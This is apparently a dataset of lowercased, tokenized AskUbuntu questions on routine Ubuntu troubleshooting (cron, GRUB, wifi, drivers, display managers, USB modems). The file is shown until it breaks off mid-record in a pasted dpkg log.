471479	can not run a gui app from cron	after doing a `` sudo su - '' on an ubuntu 12.04 notebook i did a `` crontab -e '' , added this : * * * * * env display=:0.0 /usr/bin/gnome-calculator and waited for minutes . nothing happened . i do n't have any external monitors and if i run this command `` env display=:0.0 /usr/bin/gnome-calculator '' in the terminal , it just works . but not from cron . why ? the syslog only contains this : may 24 14:37:01 localhost cron [ 1227 ] : ( root ) reload ( crontabs/root ) may 24 14:37:01 localhost cron [ 16432 ] : ( root ) cmd ( env display=:0.0 /usr/bin/gnome-calculator ) and i already tried an `` xhost +localhost '' . [ root @ notebook /var/log ] xhost access control enabled , only authorized clients can connect inet : localhost.localdomain si : localuser : username [ root @ notebook /var/log ] so the solution for another question like this on askubunut did n't worked .
471482	ubuntu on my nexus 7 manul download .img files not installing	i am trying to install ubuntu on my nexus 7 , and using manual download method for the installation . other pre-packages got installed and when doing '' fastboot flash recovery /path/to/trusty-preinstalled-recovery-armel+mako.img '' it just says < waiting for device > for a long time and do nothing . am new to this touch install . help me to complete the installation . how to solve this ?
471483	sources list error when opening synaptic package manager	when opening synaptic package manager following error occurs : an error occurred the following details are provided : e : deformed line 1 in sources list /etc/apt/sources.list.d/canonical_partner.list ( âťuriâť ) e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report . what i have to do to correct this ?
471484	how do i install plugins for wordpress ?	i 've installed wordpress by the software centre , now what i 'm interested in doing is adding plugins and the codex centre ( http : //codex.wordpress.org/managing_plugins ) tells me that i should see a plugins option in the panel to the left-hand side of wordpress that , for some reason , i do n't see . here 's my screenshot and here 's what i 'm told i 'm meant to see ( from this website ) . what i see what i 'm meant to be seeing .
471487	grub , linex and windows 7	i have grub , linux , and windows 7 . someone installed grub and linux on my computer . we had partitions . now i got rid of the partitions and linux . the problem is when i turn my computer on now i get : grub loading . welcome to grub ! error : no such partition . entering rescue mode ... grub rescue > all i want is to keep my windows and get rid of everything else .
471490	creating bridge from wlan to ethernet	i know there is lot of threads about bridges and how to make them and manage them but still i have n't reached a goal . so i need bridge between wlan and ethernet but mean while i need connect to hotspot adapter which will gain access to internet . so basicaly scheme ir something like this tp-link_m5 ( hotspot ) < -- -coneection -- - > pc ( wlan adapter ) < -- -bridge -- - > pc ( eth ) < -- cable -- > voip adapter i have n't tried with windows does it even works . before that i tried with another tp-link router which had wds but network died quite fast . i know i can reach goal using packet forwarding but i am interested in this option ... both my cards . *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 05 serial : 24 : b6 : fd:13 : b2 : bd size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:52 ioport : d000 ( size=256 ) memory : f3204000-f3204fff memory : f3200000-f3203fff *-network description : wireless interface product : centrino wireless-n 1030 [ rainbow peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : wlan0 version : 34 serial : ac:72:89:35:77:08 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=18.168.6.1 ip=192.168.0.100 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:54 memory : f7a00000-f7a01fff
471493	error after adding entry to ligthdm.conf	after giving entry greeter-show-manual-login=true in lightdm.conf file it gives an error after reboot that system running in low graphics again if i remove the above entry the system boots normally without the error .
471499	odd include errors building using ubuntu sdk	i 'm trying to write a scope in 14.04 that makes dbus calls to pidgin . i use # include < qt5/qtdbus/qdbusinterface.h > as one of the include statements but when i build my project i get an error outside the project . /usr/include/qt5/qtdbus/qdbusinterface.h:45 : error : qtdbus/qdbusabstractinterface.h : no such file or directory # include < qtdbus/qdbusabstractinterface.h > it seems the headers do not reflect the same include path for qtdbus # include < qtdbus/qdbusabstractinterface.h > so how can i adjust for this in my project ? i 'm using ubuntu sdk .
471500	how do i install wordpress.org ?	i learnt recently that the wordpress software in the software centre is wordpress.com , i want wordpress.org as it 's more feature-full . i have downloaded the zip file and extracted its contents but it 's all in php format . i looked at the readme file and it said to open the php install file in my web browser ( which for me is google chrome ) but whenever i do this it just re-downloads this file in the /home/fusion809/downloads folder . it says in the readme : if for some reason this doesn’t work , don’t worry . it doesn’t work on all web hosts . open up wp-config-sample.php with a text editor like wordpad or similar and fill in your database connection details . save the file as wp-config.php and upload it . open wp-admin/install.php in your browser . i have no idea how to fill in the database connection details .
471502	stop/avoid overlapping desktop icons ?	i am running ubuntu 14.04 . icons on desktop overlaps as follows : i want to avoid this and set icons ' possible positions only on finite grid alignment . how to do/solve this ?
471506	chromium glitches when resizing browser window	i have some strange glitches when my browser window is resized . firefox , and other programs are working fine , only chromium is having issues . i tried to turn on/off gpu acceleration but same problems are happening . also , same is happening in : chrome beta chrome stable it 's very strange because on my other workstation at work with internal gpu ( i5 4200u ) all is working fine . nvidia driver version : 331.38 edit : here is the screen record video : https : //www.youtube.com/watch ? v=hsbiec0v_n8 & feature=youtu.be
471510	system settings menu ubuntu 14.0	is it normal to have such a reduced system settings menu in ubuntu 14.04 ? no options for keyboard , sounds ... right click on shut down and then selection on system settings
471511	installing 14.01 on to a spare drive in pc	i have a pc with 3 hard-drives . i am trying to install ubuntu 14.01 onto one of them . i have tried now 3 times and came nowhere . i used the “something else” option . after all the installation procedures , i like to reboot the pc , i have to use the bios switching to try and just get an error = [ no such partition see grub rescue ] ? i am also than unable to see the “ubuntu drive” with windows7 . just gone ! if i reboot with ubuntu live cd than i can see all 3 drives ? please help , what do i make wrong . i have retyped all the info from the ubuntu installation screen . the “tick” is greyed out and i can not get rid of it . i have to use win7 disk management to re-format the drive and make a swap partition and than i am back at square 1 . copied from photo taken of the screen . device type mount point format ? size used system /dev/sda /dev////sda1 ntfs 60037 mb 80576 mb microsoft windows xp professional /dev/sdb /dev/sdb1 ext4 / tick 80011 mb 92 mb /dev/sdb2 swap 9 mb 0 mb /dev/sdc /dev/sdc1 ntfs 104 mb 71 mb windows 7 ( loader ) /dev/sdc2 ntfs 159933 mb 58695 mb device for boot loader installation : /dev/sdb1
471512	bluetooth timeout on boot	every time i boot my ubuntu i get something like this message : bluetooth : hci0 command timeout it slows up booting a bit so i would like to know is there fix for this . or can i disable bluetooth so it is not in booting process . thx guys wish u best : ) .
471513	chrome + touchscreen + unity ( 14.04 )	i 've got a dell 14r with touchscreen with ubuntu 14.04 . when i start google chrome by clicking the launcher with the touchpad or with the super+ combination , touch support in chrome does n't work . when i touch some element , it only gets focus , but does n't activate the element ( button , field , etc ) . and touch gestures do n't work . in the other hand , if i start chrome by touching the launcher button , touch scroll works in chrome , even flicking to left does back to the previous page , etc . it does n't makes sense to me , but is always like this , even across reboots . anyone can confirm this ? any idea on how to fix ?
471519	how to install theme packs and icon packs on 14.04	how do i install the `` moka '' icon pack on ubuntu 14.04 and a theme pack ?
471520	openbts installation	i 'm trying to install openbts software on my laptop . after i type svn co http : //wush.net/svn/range/software/public i get following : authentication realm : http : //wush.net:80 subversion login username : it asks me for username & password . where to register for that ? i try to register on wush.net but no success . thanks .
471523	install wc3 markup validator locally	how to install and use w3c markup validator on ubuntu 13.10 locally ? i know i can install it by installing following packages : sudo apt-get install libapache2-mod-perl2 sudo apt-get install w3c-markup-validator but how do i configure it to use it same way as on-line version ( that is by web browser ) , but locally ?
471524	delay deja-dup when starting system	i am backing up my dropbox folder with deja-dup . is there a way to delay deja-dup about 20 min after system start so that dropbox gets the chance to sync to the newest files before the backup is performed ?
471526	configure python and cvblob	hi i 'm trying to configure cvblob in order to use it with python , using the explanition h here but when i came to test it i got this error : sabrine @ sabrine-aspire-5742z : ~/downloads/cvblob/python/cvblob $ ./build.sh in file included from /usr/include/boost/python/detail/prefix.hpp:13:0 , from /usr/include/boost/python/args.hpp:8 , from /usr/include/boost/python.hpp:11 , from _cvblob.c:1 : /usr/include/boost/python/detail/wrap_python.hpp:50:23 : fatal error : pyconfig.h : no such file or directory # include < pyconfig.h > ^ compilation terminated . g++ : error : _cvblob.o : no such file or directory g++ : error : unrecognized command line option â-wlâ how can i solve this ?
471527	fresh , fully updated install of ubuntu , extremely slow wifi	i 'm brand new to ubuntu , and unfortunately on first install i 'm encountering a tonne of issues and am genuinely considering trying another linux distribution if i ca n't get them sorted out ; they 're that crippling . the biggest one is my wifi speed appears to be 1/10 or less of what it should be . at times i get 1mb/s , most of the time i get 50kbps . i 'm aware that i 'll need to post something like a dxdiag here , but i do n't exactly know what is relevant to this issue and what is not . if anyone can direct me on what to post so that you guys get the full picture , please do so . relevant lsusb output : bus 003 device 008 : id 0846:9030 netgear , inc. wna1100 wireless-n 150 [ atheros ar9271 ]
471528	i dual booted 64 bit ubuntu 14.04 with windows 8.1 on laptop with 4 gb ram..it now shows 2gb in either operating system	i dual booted ubuntu 14.04 64-bit with windows 8.1 on a laptop with 4 gb ram ... i noticed that my computer was much slower after the dual boot , so i checked the ram in ubuntu and it showed 2 gb ... and then i checked the ram in windows and it showed 2 gb ... it looks like my 4 gb ram got divided into 2 parts : 1 for windows and 1 for ubuntu . how can i make both windows and ubuntu use the full 4 gb ram when they are respectively running ? i have searched for solutions and this seems to be a problem with quite a lot of people , and i did not find any answer or solution in any of the searches that i made . please suggest a solution . hi these are some additional details.. i went to bios and it shows that i have 2gb ram only ... i put ubuntu 14.04 on a usb stick again and restarted my computer ... during re-installation , the ubuntu 14.04 recognizes that you have windows and ubuntu 14.04 and provides an option to erase the existing ubuntu 14.04 and re-install ubuntu 14.04 ... .i did that ... the newly installed ubuntu 14.04 still has the same problem.. but during re -install there is this option something else..and it has settings for swap space etc..but i dunno how to do it ... p.s i took screenshots , but i dont know how to upload it here..there is no option here to upload images..could anybody please tell me how to do it ...
471531	vpn failure lubuntu 14.04	i just installed lubuntu 14.04 as an upgrade to 13.04 . now , when i attempt to run an openvpn connection i get an error message . ( everything worked fine in 13.04 . ) clicking on the network icon gets me a dialogue box called connection properties . when i hit the configure tab i get the error message : this interface does not exist.o both network-manager-openvpn and network-manager-openvpn-gnome are installed . when i use the menu button to go to preferences > network connections i get a dialogue box showing that i am set up for all the vpn 's with the correct name and configurations but not given any help in starting one of the services . obviously , i have not installed some subsidiary program , but i have gone over all the options in both the lubuntu software centre and and synaptic package manager and can find noting that might help . what program do i need to download to make this package complete ?
471533	install kde de without any effect on unity	yesterday i installed kde in ubuntu 14.04 and i was quite pleased . then i realised that the kde install had messed up with fonts and all i had were ugly looking fonts ( in chrome and firefox to be specific ) installed all sorts of kde apps i did n't intend to install ( though i liked dolphin ) changed my splash screen to that of kubuntu changed unity 's sub-menu colour when i set up a new theme in kde i tried to fix these issues but when no method worked , i ended with formatting and doing a new ubuntu install . is there a way to install kde without these issues ?
471537	can no longer boot into ubuntu using windows boot manager	just reinstalled windows 7 pro and ubuntu is no longer accessible from the windows boot manager as it was before.how do i re-enable booting into ubuntu ? thank you .
471538	host file not working	i am new to ubuntu and trying to setup a redirect in my host file to redirect a development url to my development server . externalip example.com in windows i edited the hosts file and all was good . i did the same thing in /etc/hosts and it is not working . can someone point me in the right direction ? i am running 14.04 . thanks .
471540	problem to compile project ( libx11-dev libxext-dev )	i 'm trying to compile a project that uses these two packages : sudo apt-get install libx11-dev libxext-dev but i 'm having the following error when linking : building ... /home/rafael/src/edk2/emulatorpkg/library/peiemuserialportlib/peiemuserialportlib.inf [ ia32 ] make : nothing to be done for `tbuild ' . /usr/bin/ld : can not find -lxext /usr/bin/ld : can not find -lx11 important : the apt-get install says everything is fine : rafael @ noteevelin : ~/src/edk2 $ sudo apt-get install libx11-dev libxext-dev reading package lists ... done building dependency tree reading state information ... done libx11-dev is already the newest version . libxext-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . but i did n't find the libs at /lib and /usr/lib . my os is ubuntu 14.04 lts . any idea ? thanks and regards , rafael r. machado
471543	ipython emacs send code to interpreter	i am using ipython3 with emacs . it works but i would like to define a command that automatically send the highlighted code to the console . how can i do that ? this should be a short cut for the command : m-w , c-x o , c-y , enter that is : copy , focus on the second buffer ( that is the ipython3 terminal ) , copy and press enter . how can i do that ? this is my current .emacs file ( setq python-shell-interpreter `` ipython3 '' python-shell-interpreter-args `` '' python-shell-prompt-regexp `` in \\ [ [ 0-9 ] +\\ ] : `` python-shell-prompt-output-regexp `` out\\ [ [ 0-9 ] +\\ ] : `` python-shell-completion-setup-code `` from ipython.core.completerlib import module_completion '' python-shell-completion-module-string-code `` ' ; '.join ( module_completion ( ' '' % s '' ' ) ) \n '' python-shell-completion-string-code `` ' ; '.join ( get_ipython ( ) .completer.all_completions ( ' '' % s '' ' ) ) \n '' )
471544	pen drive format	i installed ubuntu 14.04 using my pen drive . the problem is i need my pen drive back with the same storage . is there is any way to do like that please .
471546	internal hard drive not appearing after i partitioned and mounted it using webmin 's logical volume management . should i be concerned ?	running ubuntu 12.04 lts server , i attempted to partition one of the internal hard drives , /dev/sdb , using the logical volumes management tool in webmin following the guide found here : http : //stevenmcmurry.com/howto/2012_08/set-lvmlvm2-using-webmin now , when i run the command sudo lshw -c disk /dev/sdb no longer appears as one of the listed drives . when i run : sudo lvdisplay the output of this appears to give me the drive because the size of the drive ( 3tb ) is right and is the only 3tb drive . i mounted the drive under /media/archive . now does that meant that anything i save in that directory will be saved on that drive , i 'm attempting to copy all my media only that drive ? i am running ssh , putty , so copying and pasting is n't possible . if you guys need some actual outputs i 'll have to post some snips .
471547	ubuntu 14.04 termial : hub 4-6 can not enable port 3. maybe usb cable is bad	i am gettin this message in ubuntu termial and i do not know how to make it stop , since i cannnot use the terminal with this error ? any one knows why and i can i solve this ?
471551	why is this key remapping not working in vim ?	this problem is getting me really crazy . i used gvim and autohotkey under windows 7 in the past . for various reasons , i mapped ctrl+d to behave likes enter . this worked well so far . in gvim i mapped the enter/return to act as page down key : nnoremap < cr > < pagedown > this worked good . previous week i decided to give ubuntu a try again . with autokey , i remapped my ctrl+d to behave likes enter . keyboard.send_key ( `` < enter > '' ) this worked fine in everything in ubuntu/xubuntu . i 'm using gnome terminal . and there , ctrl+d behaves like enter . when i am in vim in insert mode , ctrl+d does the same as enter . in normal mode , i do n't get the expected behaviour with nnoremap . i found this very odd , given the fact the ctrl+d worked good in terminal and in insert mode in vim . when i press the 'real ' enter . i get the behaviour ( page down in vim ) but i do n't get the same behaviour with mapped ctrl+d in normal mode . in insert mode , it behaves like enter . i tried to change the maps , in order to detect the problem , like : nnoremap < return > < pagedown > nnoremap < enter > < pagedown > nnoremap < cr > ij nnoremap < cr > ij nothing of them worked so far with ctrl+d in normal mode . i find it oddly that it worked well in insert mode and in terminal . i looked into vim 's manual to get some ideas what went here . with no results sofar . i use vim as my daily editor , so i feel so angry about this , because i do n't understand why this issue occur in normal mode . anyone know what is going on there ? i would really appreciate your help , because this is making me really crazy .
471552	new hardware - > random freezes and reboots	i need some help from the community on this one . i recently started playing dota2 through steam on my box and decided to upgrade a few of the components for better gameplay . first i added in another 4gb card to bring my total up to 8gb of ram and i bought a new gpu as well ( radeon r7 260x ) . i found that my psu was likely a little underpowered , so i picked up a new capstone 550w and got that and the new graphics card installed . i 've since noticed several `` problems '' or symptoms at the very least . sometimes i get this weird snow on the screen ( think turning on an old crt tv without the coax cable plugged in ) but it 's very minimal . overall you can see the picture just fine , but if you look closely at the screen you can see noise in the image ( usually flickering red dots all over the screen ) . rebooting seems to fix the `` red snow '' problem . i 've also had some random reboots but lots and lots of freezes which only happen when i 'm gaming ( sometimes in the middle of games , other times just while the game is loading ) . i 've done a bunch of searching around , but i ca n't find any clear indicators as to what my problem might be . system details : running the oz diamond ii-b unity ue ( ubuntu 13.04 64-bit ) amd radeon r7 260x gpu amd phenom ii x6 1045t 6-core cpu 2x4gb kingston hyperx red ram asus m6a78l-m lx motherboard 120gb intel ssd 500gb hard drive ( ca n't recall the brand ) capstone 550w psu other info : i did try out the new gpu for about 5 minutes with the old power supply ( it booted just fine , but suddenly unity was broken ) so i reinstalled the old gpu until i had the new psu . after installing all the new components , unity was still broken and nothing i could do seemed to help , so i ended up just reinstalling the os over it which fixed my unity problems . the only time i think i 've had any of the freezes or reboots has been when playing , or trying to play , dota2 . also i 've installed the `` latest drivers '' from amd 's website for the gpu , but when i go to the additional drivers section of system settings it does n't show any options ( no open source or proprietary drivers ) . is it something to worry about ? any/all advice is much appreciated . thank you in advance !
471553	leap motion sdk broke ubuntu	i am getting can not create bytes broken pipe error after installing the leap motion sdk on ubuntu 12.04 earlier , while installing the two dependencies given in the sdk 's readme , i had to sudo apt-get -f install to resolve dependencies and fix broken packages . i am able to access to recovery mode . should i dpkg - repair broken packages or something else ? ctrl alt f1 or f2 does nothing at thr black broken pipe screen . also , this is the second time this happened because of the leap motion sdk . i reinstalled ubuntu earlier .
471559	how to stop annoying sound tuyy tuyy in terminal ?	i like auto complete option in ubuntu terminal . whenever i press the tab automatically word will complete . but if the word ( file/directory/command ) not find , it is giving an annoying sound tuyy tuyy tuyy tuyy tuyy ( each tuyy sound per tab ) . if the word does n't complete , even i press tab for multiple times i can understand that there is no file/derectory with that name . i have enough intelligent to understand that there is no such word . why it is giving that terrible sound ? whenever this sound produced : my parents , my teachers , my classmates and room mates are looking me ( sharply and with big eyes for 1 sec ) that i did something horrible thing . few people looks like hang this person . sometimes i 'm also getting the doubt myself few times that am i really did big mistake . i ca n't mute my laptop , because empathy and skype notifications come . why ubuntu made this sound . please help me . i checked sound settings . but i did n't find anything which helps me . requests : 0.is there any command or tools or settings which helps me ? ( if not ) 1.ubuntu i 'm kindly requesting you : please change this horrible tuyy sound to something pleasant music . so that at least my friends , parents.. will thought i 'm doing something good . ( or ) 2.i 'm using gnome de . someone release the extension which stops annoying tuyy sound in terminal . thank you . have fun . sleep well ( do n't get tuyy sounds in your nightmares like me ) .
471561	how to view 3d pdf files ?	is it possible to view 3d models with pdf documents ? there are a number of pdfs which contain detailed 3d models such as this example : http : //www.carare.eu/eng/content/download/2718/21413/version/1/file/macellum_at_pompeii.pdf the models are viewable in windows and osx but i ca n't find any way to view them in ubuntu . i 've tried evince but it does n't work .
471563	claws-mail forgot about read/unread anwered/unanswered marks after update	i 've updated my system to 14.04 , thereby manually copying my home folder ( including all hidden files and folders ) with cp -a to the new system . in claws-mail , all my mails and settings are present as it was before . however , it shows me all the mails as unread , and also the `` answered '' -marks are gone . i really want to get them back . i 'm quite puzzled , since all personal data should be present as it was before the update . where does claws-mail store those marks ? was there some change in the handling of those marks ?
471565	wifi is working but the f12 ( wifi key ) is constantly glowing orange	i installed ubuntu 13.10 saucy one month ago and have been using it regularly . the wifi has worked fine until today , when i connected my laptop ( hp pavillion n-013tx ) to an ethernet cable and when i disconnected from it . i realized that the wifi button light was orange although the wifi seems to be working fine even now . i have been trying to find the solution to this problem for hours now but ca n't find the problem with this description anywhere . output of rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no moreover i have noticed that the speed of connection has also decreased pretty much .
471567	ubuntu 12.04.04 usb genius slimstar 800 mouse stopped working	i have updated my ideapad y510 laptop and it seems after some updates the mouse stopped working . the mouse was working fine before but now it is not recognized anymore . i tried changing batteries and it works on other computers so the mouse is fine . i have purged and reinstalled xserver-xorg sudo apt-get remove -- purge xserver-xorg then sudo apt-get install xserver-xorg sudo dpkg-reconfigure xserver-xorg i then realized the /etc/x11/xorg.conf file was no longer there even though everything still worked except the usb mouse so i did : sudo x -configure sudo mv xorg.conf.new /etc/x11/xorg.conf if i run locate genius /lib/modules/3.11.0-17-generic/kernel/drivers/media/rc/keymaps/rc-genius-tvgo-a11mce.ko /lib/modules/3.11.0-18-generic/kernel/drivers/media/rc/keymaps/rc-genius-tvgo-a11mce.ko /lib/modules/3.11.0-19-generic/kernel/drivers/media/rc/keymaps/rc-genius-tvgo-a11mce.ko /lib/modules/3.11.0-20-generic/kernel/drivers/media/rc/keymaps/rc-genius-tvgo-a11mce.ko /lib/udev/keymaps/genius-slimstar-320 /usr/share/app-install/desktop/gnome-genius : gnome-genius.desktop /usr/share/app-install/icons/gnome-genius.png uname -r 3.11.0-20-generic lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 755m ] ( rev a1 ) if i run dmesg the mouse does n't show in the list , no error nothing although it seems i am using the nvidia driver ( i tried installing nvidia-common , it says it 's already installed ) if i look in addition driver it says i do n't use any proprietary drivers . lspci -vnn | grep -i vga -a 12 00:02.0 vga compatible controller [ 0300 ] : intel corporation 4th gen core processor integrated graphics controller [ 8086:0416 ] ( rev 06 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device [ 17aa:3801 ] flags : bus master , fast devsel , latency 0 , irq 46 memory at c2000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:03.0 audio device [ 0403 ] : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller [ 8086:0c0c ] ( rev 06 ) subsystem : lenovo device [ 17aa:3978 ] -- 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk107m [ geforce gt 755m ] [ 10de:0fcd ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device [ 17aa:3801 ] flags : bus master , fast devsel , latency 0 , irq 16 memory at c0000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at 90000000 ( 64-bit , prefetchable ) [ size=256m ] memory at a0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 4000 [ size=128 ] expansion rom at a2000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nouveau kernel modules : nouveau , nvidiafb how could i fix this problem ? thanks
471573	is there a way to give my licence codes ( from another site ) permanently to ubuntu one ?	can i install application i bought on owner 's site that gave me licence code ? i was on precise , now i am on trusty , i would prefer to get my app from ubuntu one . is there a way to give my licence codes permanently to ubuntu one ? because here in ubuntu i often change my login-name @ computer-name name and my distro version . this pc is dying , when i 'll have a new one , i want to use my licence code safe . and the program i have is crossplatform for 3 computers max so i would like my registration not only to be a licence code . and i want to be able to say : new ubuntu version , double-boot or virtual computer , new computer , changed my username and my pc name , my active computers ( activate for them ) formatted or dead computers ( desactivate for them )
471574	ubuntu wo n't boot on acer c7 chromebook	i downloaded ubuntu 12.04 on my acer c7 chromebook and it wo n't boot up . it keeps going to the welcome page when i boot up the computer .
471575	keeping files on current hdd during sdd upgrade	i 'm planning on upgrading my media server to use an ssd for the os & applications , but my hdd is loaded with a current instal of ubuntu 14 and all of my media . i plan on doing a fresh install on the ssd and would like to use the existing home folder on the hdd and recover the space allocated to the operating system and applications . the main reason for this is that i do n't want to have to migrate my media to a backup and then back to the hdd .
471579	can udisks be removed from 14.04 and replaced with the functionality of disk utility from 12.04 ?	i 'm currently testing 14.04 and while there are many things i like about it , the udisks bugs are upsetting . i 'm currently running 12.04 on all production systems due to these problems which if i 'm not mistaken began with 12.10 and have been present ever since . when i try to use benchmarking from within disks on an unmounted partition on sda , i get the following error : error seeking to offset 2560872448 ( g-io-error-quark , 13 ) supporting data ( too long to include here ) : http : //pastebin.com/7ymaemtj
471584	wireless setup , lubuntu 14.04 on dell e6400	i am using lubuntu 14.04 on dell e6400 . unable to see wireless connection . on running 'nm-applet ' it shows `` wireless connections available , please use network menu to connect to internet '' . however there is no wireless interface on the task panel on right bottom please see few of queries run on my terminal at http : //pastebin.com/9bxfskgf please suggest .
471586	3 modems huawei e220 - finding diferent data to make permanent usb ports	i have 3 modems huawei e220 usb connected on the same hub in the back usb motherboard ports . after they are connected they work very well - no conflicts . when i restart the system , all usb ports change ! i want to make permanent usb ports to these usb modems . they are same vendor and model . bus 002 device 003 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e230/e270/e870 hsdpa/hsupa modem bus 002 device 005 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e230/e270/e870 hsdpa/hsupa modem bus 003 device 003 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e230/e270/e870 hsdpa/hsupa modem note : for each usb modem , linux attributes two ports so : 1st modem - usbo & usb1 2nd modem - usb2 & usb3 3rd modem - usb4 & usb5 ls /dev/ttyusb* /dev/ttyusb0 /dev/ttyusb1 /dev/ttyusb2 /dev/ttyusb3 /dev/ttyusb4 /dev/ttyusb5 i suppose that 's one for modem , other for cd-rom mass storage device . when doing a udevadm info , i get this : # udevadm info -a -n /dev/ttyusb0 | grep ' { serial } ' attrs { serial } == '' 0000:00:1d.0 '' # udevadm info -a -n /dev/ttyusb1 | grep ' { serial } ' attrs { serial } == '' 0000:00:1d.0 '' # udevadm info -a -n /dev/ttyusb2 | grep ' { serial } ' attrs { serial } == '' 0000:00:1d.0 '' # udevadm info -a -n /dev/ttyusb3 | grep ' { serial } ' attrs { serial } == '' 0000:00:1d.0 '' # udevadm info -a -n /dev/ttyusb4 | grep ' { serial } ' attrs { serial } == '' 0000:00:1d.1 '' # udevadm info -a -n /dev/ttyusb5 | grep ' { serial } ' attrs { serial } == '' 0000:00:1d.1 '' if serial are the same in the first two modems , which other data can be used to differ between these 3 modems ?
471590	accidentally did `` chmod -777 / ``	i accidentally did chmod -777 / now i ca n't access anything , when i restart a dialog shown like `` your graphics is set to low '' , after giving ok , then there is a option `` exit to login screen '' when i select this i get a blank screen with `` - '' on top . is there any way to revert this process or at least to recover the data ? p.s : i m using windows vista and ubuntu 13.04 ( dual boot ) .
471591	error message when trying to run ubuntu from disk - windows 8.1	so i recently had to get a new computer . it came pre-installed with windows 8.1 . needless to say , the past month has been a nightmare . after a number of issues , thanks to a suggestion and to avoid having to pay $ 100 to downgrade to windows 7 , i decided to try linux . but , after burning the ubuntu disc image to a disc , i get an error message when trying to run the operating system and got an error message stating something was wrong with my windows 8.1 , what a surprise ... i 'm pretty stuck here and wondering if anyone has had success with ubuntu and windows 8.1 . i 'll try to regenerate the error message and get a picture of it . thanks .
471593	gdm and lightdm do n't work after update ; kdm is ok	after updating ubuntu ( apt-get update , apt-get upgrade and apt-get dist-upgrade ) last tuesday , gdm stopped working , and the startup hangs on the ubuntu logo . lightdm also do n't work ( same happens ) . if i start gdm manually from commandline , it opens and shows the time , accessibility options , and so on , but with no login and password form ; and if i start lightdm , it opens in low-graphics mode and the mouse cursor does n't appear . so i used the tty console to install kdm , which works as expected . i 've tried to purge and reinstall both gdm and lightdm , but no success . editing /etc/x11/default-display-manager , using dpkg-reconfigure , dpkg -- configure -a also did n't help . ( i have ubuntu 14.04 with xfce desktop and had gdm as display manager . dual boot with windows 7 . ) these are the logs i believe that can be useful , but i can post other logs if needed : this is the part of dpkg.log that lists the updates done that day : 2014-05-20 00:33:02 startup archives unpack 2014-05-20 00:33:15 upgrade vlc-plugin-pulse : i386 2.1.2-2build2 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:15 status half-configured vlc-plugin-pulse : i386 2.1.2-2build2 2014-05-20 00:33:15 status unpacked vlc-plugin-pulse : i386 2.1.2-2build2 2014-05-20 00:33:15 status half-installed vlc-plugin-pulse : i386 2.1.2-2build2 2014-05-20 00:33:15 status triggers-pending vlc-nox : i386 2.1.2-2build2 2014-05-20 00:33:15 status half-installed vlc-plugin-pulse : i386 2.1.2-2build2 2014-05-20 00:33:16 status half-installed vlc-plugin-pulse : i386 2.1.2-2build2 2014-05-20 00:33:16 status unpacked vlc-plugin-pulse : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:16 status unpacked vlc-plugin-pulse : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:16 upgrade vlc-plugin-notify : i386 2.1.2-2build2 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:16 status half-configured vlc-plugin-notify : i386 2.1.2-2build2 2014-05-20 00:33:16 status unpacked vlc-plugin-notify : i386 2.1.2-2build2 2014-05-20 00:33:16 status half-installed vlc-plugin-notify : i386 2.1.2-2build2 2014-05-20 00:33:16 status half-installed vlc-plugin-notify : i386 2.1.2-2build2 2014-05-20 00:33:16 status half-installed vlc-plugin-notify : i386 2.1.2-2build2 2014-05-20 00:33:17 status unpacked vlc-plugin-notify : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:17 status unpacked vlc-plugin-notify : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:17 upgrade vlc : i386 2.1.2-2build2 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:17 status half-configured vlc : i386 2.1.2-2build2 2014-05-20 00:33:17 status unpacked vlc : i386 2.1.2-2build2 2014-05-20 00:33:17 status half-installed vlc : i386 2.1.2-2build2 2014-05-20 00:33:17 status triggers-pending mime-support : all 3.54ubuntu1 2014-05-20 00:33:17 status half-installed vlc : i386 2.1.2-2build2 2014-05-20 00:33:18 status triggers-pending man-db : i386 2.6.7.1-1 2014-05-20 00:33:18 status triggers-pending bamfdaemon : i386 0.5.1+14.04.20140409-0ubuntu1 2014-05-20 00:33:18 status half-installed vlc : i386 2.1.2-2build2 2014-05-20 00:33:18 status triggers-pending desktop-file-utils : i386 0.22-1ubuntu1 2014-05-20 00:33:18 status half-installed vlc : i386 2.1.2-2build2 2014-05-20 00:33:18 status triggers-pending gnome-menus : i386 3.10.1-0ubuntu2 2014-05-20 